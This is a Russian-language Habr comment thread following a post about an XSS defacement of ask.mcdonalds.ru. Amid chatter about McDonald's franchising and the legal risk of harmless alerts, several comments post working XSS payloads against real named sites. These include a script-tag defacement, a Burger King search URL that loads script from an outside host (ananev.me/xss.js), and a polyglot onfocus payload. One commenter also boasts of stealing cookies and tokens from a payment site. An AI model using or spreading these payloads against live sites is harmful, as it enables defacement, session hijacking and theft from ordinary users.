Pull to refresh

Comments 53

А что останавливает? :)
">')"></stYle/</titLe/</teXtarEa/</scRipt/--!><script>document.write('<center><h1><a href="https://habrahabr.ru/post/334564">Дефейс ask.mcdonalds.ru</a></h1><img src="https://hsto.org/getpro/habr/comment_images/948/6d6/84a/9486d684a7b910a6b7d2732e3eaae9bb.jpg"></img></center>');</script>

Слишком большой скрипт. Ругается на длину имени

Делаем ссылку на js, в котором document.write, по желанию изменяемый

Да это понятно :) В любом случае, в качестве теста — почему бы и нет. А вот такой скрипт — нет уж

Ожидал увидеть другое под катом.

Дефейс хабра 2008-го года поди уже не помнит никто. Или просто не застали.

С чёрным властелином-то? :D

Он увековечен на Лурке, такое не забывается :)

«Что должен сделать хакер, чтобы заработать на чизбургер?»
Как хорошо, что в Макдаке нет солонок.
Говорить о том, что такое компания Макдоналдс, я думаю, будет излишним.


На сколько я знаю все региональные мак-даки всего лишь шраншиза. Это обычная «Рога и Копыта», которая купила право на вывеску, и сделан сайн таким же ООО «Подвальный Вася Девелопмент» за бесплатный биг-мак))

У компании есть официальное представительство в России, и сайт принадлежит не какому-то одному провинциальному ресторану, открытому по франшизе.

Официальный представитель заказывает услуги создания сайта у PR компании «X» которая забирая часть денег передает это задание компании «Y», которая ищет кого-то за дешево, кто может сделать сайт и имеем, что имеем) Работает это как-то так
если кому то интересно про макдаки — могу много рассказать. у меня жена там работает. Обычно сеть распределена по регионам. то есть за конкретный регион отвечает какой то один ген-дир, который следит за всеми точками своего региона. занимается их продвижением и развитием. делается там всё по стандартам, диктуемым свыше. есть разного уровня проверки и экзамены. просто так с улицы бомж вася не может придти и стряпать вам бургеры. всех заставляют проходить обучение. начиная от младших сотрудников и заканчивая управленческим персоналом. поэтому юридически все макдоналдсы это российские юрлица работающие по франчайзи, и как правило, все они содержат целый регион ресторанов а не 1 точку. их заставляют и вынуждают расширяться и открывать всё больше точек. одного ИПшника или ооошника который откроет один ресторан и будет с ним сидеть — никто там держать не будет. но по качеству хавки получается так, что главное управление макдональдса следит за соблюдением технологий как у поставщиков так и на местах насколько это возможно. в зависимости от места и отношения конкретного директора к правилам и нормам, качество обсулуживания может варьироваться от наивысшего до убогого. Причём лучше всего качество должно быть там, где большой нескончаемый поток клиентов — там правила нарушать сложнее всего и продукция просто не успевает портиться и остывать. если же точка расположена неудачно и поток покупателей переменный, могут быть ситуации когда директор закрывает глаза или даже сам заставляет делать так, чтобы работники не соблюдали таймера на продукцию. то есть пирожки и котлеты, а также картошка и продукция, выложенная из пакетов и холодильников, вся ставится на таймеры от 5 до 25 минут. если она пролежала это время и её не пустили в ход — она должна быть списана по правилам. и её должны выкинуть. в точках с переменным потоком клиентов, это может быть экономически не выгодно и поэтому эти сроки нарушаются. чаще всего это происходит с пирожками и редко покупаемыми товарами. опасности для здоровья это не несёт, но вкус может значительно пострадать. Также есть ситуации когда чмошные менеджеры или директора разбавляют сироп и молочный субстрат для мороженки. на сиропе это сложно заметить, а вот если вам дают рожок который сразу же начинает течь — значит молочная смесь была разбавлена водой (или более редко — не правильно приготовлена или оборудование неисправно). менеджеры которые обслуживают точку, скорее всего сладкоежки, и на халяву жрут мороженку, а чтобы восполнить недостачу доливают в баки воду =))) на такое сразу надо жаловаться директору и писать в жалобную книгу. менеджеров скорее всего уволят. несколько таких жалоб подряд — и уволят директора.

Несколько лет назад читал интервью с каким-то высокопоставленным чуваком из макдака, он говорил, что все "рестораны" в России их собственные.

Что-то мне подсказывает, что это не так. По крайней мере посмотрите в разных ресторанах на чеки, там печатается название юр. лица. В Екатеринбурге, например, в Маке на вокзале и в Маке в центре разные ОООшки были.
Ничего не значит. В России почти никто не регает все точки под одно юр.лицо.
Можете проверить в любой сети.
Более того, в Екатеринбурге владелец ресторанов не так давно менялся — кто-то у кого-то их купил.
Раньше был 1 владелец, ныне сеть в РФ разбита на 2 части: ООО «СПП» и Старая компания. Старая компания — истинно макдональдовский менеджмент и затраты, СПП — Компания стремящаяся к дичайшей экономии и прибыли.

А где Вы здесь нашли противоречие? Все эти ОООшки могут принадлежать какому-нибудь АО Макдональдс Рус, 100 процентов акций которого, кстати, в свою очередь могут быть во владении какого-нибудь McDonalds Inc. Что автоматически делает все эти, как Вы сказали, ОООшки американскими ресторанами не только в плане бренда, который они используют, но и в плане того, в какую страну в итоге уходят деньги.

Да. теперь это не так. Франчайзинговая система в РФ у них работает с 2015.

Вроде, только в Сибири. Хотя могу ошибаться.

В 2014 году мак начал работать по франшизе в РФ. До этого да, все их «рестораны» были собственные. Но это не просто франшиза — отдельный ресторан вроде как открыть не получится.

«Нам интересны партнеры, которые могут не просто открыть один или даже несколько ресторанов. Мы заинтересованы в долгосрочном сотрудничестве и ищем тех, кто способен взять в управление не просто ресторан, а целую территорию» (с) Алексей Семенов, управляющий директор «Макдональдс» в России.
Там франшиза но особенная.
Владелец должен иметь хотябы половину капитала, не должен иметь других бизнесов и должен сам стоять у кассы.
Если кто-то, как и я, заинтересовался, воспользовался ли кто-то ещё этим методом, то на 210 страницах (это всё) пока что два имени со скриптом, Евгений Колчин и Савелий Баженов.

И оба это мои аккаунты

Ну автор понял, да, что не только админам сайта, но и кулхацкерам и простым айтишникам просто в лом что-либо тут делать. Никому нафиг, видимо, не нужен какой-то там сайт с глупыми вопросами про картошку. Это ж не банк, много не унесёшь…
Я однажды написал «alert('Админ очищай ввод')» одному пивному ресторану в гостевой книге. Потом они обратились в милицию(sic) по поводу взлома и я имел бледный вид.

вычислили по почтовому голубю?

Я же прятался, я помочь хотел, вычислили провайдера по ip, а провайдер вычислил меня.
А что за это деяние хотели пришить? ну вроде не взлом (или взлом?). Ущерб навряд ли какой нанёс, сайт не испортил, функциональность сайта не пострадала, скорее всего. Где та грань, после которой УК начинается? А то так и за в нике статью припишут.
Там проблема была, как я понял, в админе, он два дня не мог JS отключить и из-за алерта ничего не мог делать с отзывами. Т.е. он два дня «чинил» сайт.
Пришить — не знаю, т.к. решилось всё раньше: милиция позвонила провайдеру, провайдер позвонил мне (т.к. мы пиво вместе пили =) и всё закончилось тем, что мне пришлось звонить в ресторан, извиняться и объяснять, что я не хотел портить ничего, а хотел предупредить о проблеме. Больше милиция никого не трогала, шел 2003 год… А сейчас могли бы и палку срубить, кулхацкера скрутить, имхо.
А то так и за в нике статью припишут.

Именно по этому я и рассказал свою историю. Иногда добрые намерения приводят к недобрым последствиям. Не все понимают взлом как помощь. Как вариант: кто-то напишет статью по мотивам поста типа «Хакеры взломали МакДак и два месяца воровали данные пользователей» и в МакДаке сверху вниз начнут бить по шапкам. Надо будет крайнего искать, а от вот… И закрутится маховик правосудия! ттт
Там регистрацию скрыли. Просто display:none на попап поставили :D
У меня лично ничего не скрыто

image
Оу, видимо вход только для юзеров из россии
Да, так было и ранее, это у них по-умолчанию принято. Вот цитата из FAQ

image
Сайт кто-то сломал. Все вопросы скрыли. Вот картинка.

Тут конечно очень странная ситуация со «взломом». Может было лучше, если никто бы об этом не знал?
Так, эта история была бы у mcdonalds и у вас. Сейчас же она у всего habr-а. Может быть у этой «франшизы» просто нет ресурсов и программистов закрыть ее, может быть люди не имеют необходимых знаний для понимания этой уязвимости. Боюсь, что эта история не закончится увольнением рядовых администраторов сайта (что уже достаточно печально).
Это проблема не администраторов, а криворуких разработчиков.
Сейчас зарегистрироваться не получилось. Выскакивает сообщение:
«Необходимо заполнить поле «Согласие на обработку персональных данных».»
Само согласие теперь добавили в форму регистрации полным текстом.

Пока на хабр не напишешь об уязвимости, никто ничего делать не хочет. А теперь похоже засуетились.
Так, а мне надо писать статью на habr с этим?

https://burgerking.ru/search?txtSearch=2134%22%27--!%3E%3C/Title/%3C/Style/%3C/Script/%3C/Textarea/%3C/Noscript/%3C/Pre/%3C/Xmp%3E%3CScript%20/K%3Es = document.createElement('script'); s.src = '//ananev.me/xss.js'; document.body.appendChild(s);%3C/Script/%3E#
рефлектед ток в лисе норм пашут :'(
Спасибо большое за ссылку. Она сделала мой день =D
Вот еще прикольное. Можно к ним на тусу сгонять в Мск http://internal.burgerking.ru

Ой, да, точно
<!'/*!"/*!//'/*//"/*--!><Input/Autofocus/%0D*/Onfocus=alert(document.domain)//>

image
Не удивлюсь, если сайт делали в Yumalabs. В списке клиентов они есть. Те, кто знает директора, поймет.
Это не они.
Не стоит обвинять их, какие бы они не были.

В гугл с запросом Разработка ask.mcdonalds.ru

Смотрим 3-ю строчку
Посмотрел портфолио разработчиков — ткнул в первый попавшийся сайт — «Общественная приемная города Жуковский» — css там тоже в наличии. У ребят системный подход к своей работе )))
Делал похожий дефейс на платёжной системе, 2 000 alexarank в мире, щедро заплатили.Позволяла воровать cookies у юзеров, а также токены для доступа к их файловому хранилищу.
Only those users with full accounts are able to leave comments. Log in, please.